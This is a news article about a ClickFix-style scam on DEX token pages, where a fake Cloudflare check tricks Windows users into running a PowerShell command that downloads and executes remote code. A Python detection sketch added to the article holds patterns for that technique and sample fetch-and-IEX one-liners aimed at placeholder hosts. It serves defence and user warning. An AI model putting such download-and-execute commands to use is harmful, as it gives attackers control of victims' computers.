Fake buttons with malicious code began to appear on DEX token pages

Johny Smith

2025/05/19



Researchers from Scam Sniffer reported a dangerous attack aimed at users of decentralized exchanges. On pages with information about tokens such as Fucklaunch, a fake "Website" button leading to a malicious domain was discovered. After following the link, the user is prompted to pass a fake verification check presented as coming from Cloudflare. Instead of a regular check, however, the victim is shown instructions for running a dangerous PowerShell command.

On devices running Windows, a message pops up asking the user to press Windows + R, paste the copied text and confirm the input. In fact, the user launches a PowerShell script that downloads and executes code from an external site. This gives attackers direct access to the computer, allowing them to steal data or install malicious software.

On macOS devices, the malicious behavior does not appear: users see a regular page. This was done intentionally to disguise the attack from analysts and reduce the likelihood of identification. Such selectivity by operating system makes the attack harder to detect and analyze.

Judging by the code, the malicious script uses the IEX $confirm command, loading external content from the Four-Meme domain. This is a standard technique for remote command execution in a Windows environment.
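A detection sketch for the pattern described above, added here as an example and not taken from Scam Sniffer's report: it flags PowerShell command lines that both fetch remote content and pass it to IEX, and raises severity when the parent process is explorer.exe, as it is for commands started from the Run dialog. The event layout, the placeholder.invalid URLs and the severity rule are assumptions made for illustration.

```python
import re

PS_HOST = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
IEX = re.compile(r"\b(iex|invoke-expression)\b", re.I)
FETCH = re.compile(
    r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient)\b"
    r"|https?://", re.I)

# Constructed sample process-creation events: (parent image, child command line).
# The layout is an assumption modelled on typical EDR / process-audit records.
SAMPLE_EVENTS = [
    (r"C:\Windows\explorer.exe",
     'powershell -c "$confirm = irm https://placeholder.invalid/v; iex $confirm"'),
    (r"C:\Windows\explorer.exe",
     r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
    (r"C:\Windows\System32\cmd.exe",
     'powershell -c "iex (irm https://placeholder.invalid/setup)"'),
    (r"C:\Windows\explorer.exe", r"notepad.exe C:\Users\a\notes.txt"),
]


def assess(parent_image, command_line):
    """Return the signals that fire for one process-creation event."""
    if not PS_HOST.search(command_line):
        return []
    signals = []
    # Heuristic: Run-dialog launches are children of explorer.exe.
    if parent_image.lower().endswith("\\explorer.exe"):
        signals.append("explorer-parent")
    if FETCH.search(command_line):
        signals.append("remote-fetch")
    if IEX.search(command_line):
        signals.append("iex")
    return signals


def triage(events):
    """Report events that fetch remote content and evaluate it with IEX."""
    findings = []
    for parent, cmd in events:
        signals = assess(parent, cmd)
        if "iex" in signals and "remote-fetch" in signals:
            # Assumed rule: the same one-liner typed into a terminal is rated lower.
            severity = "high" if "explorer-parent" in signals else "medium"
            findings.append((severity, cmd, signals))
    return findings


if __name__ == "__main__":
    for severity, cmd, signals in triage(SAMPLE_EVENTS):
        print(f"[{severity}] {', '.join(signals)} :: {cmd}")
```
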

Experts warn that such schemes can be extended to other tokens or pages with DEX analytics. They recommend treating links to new projects with caution, especially if the site offers to pass verification or execute commands on the system. Scam Sniffer urges web3 users to always check site addresses manually, not to run commands offered by unfamiliar resources, and to use antivirus software.
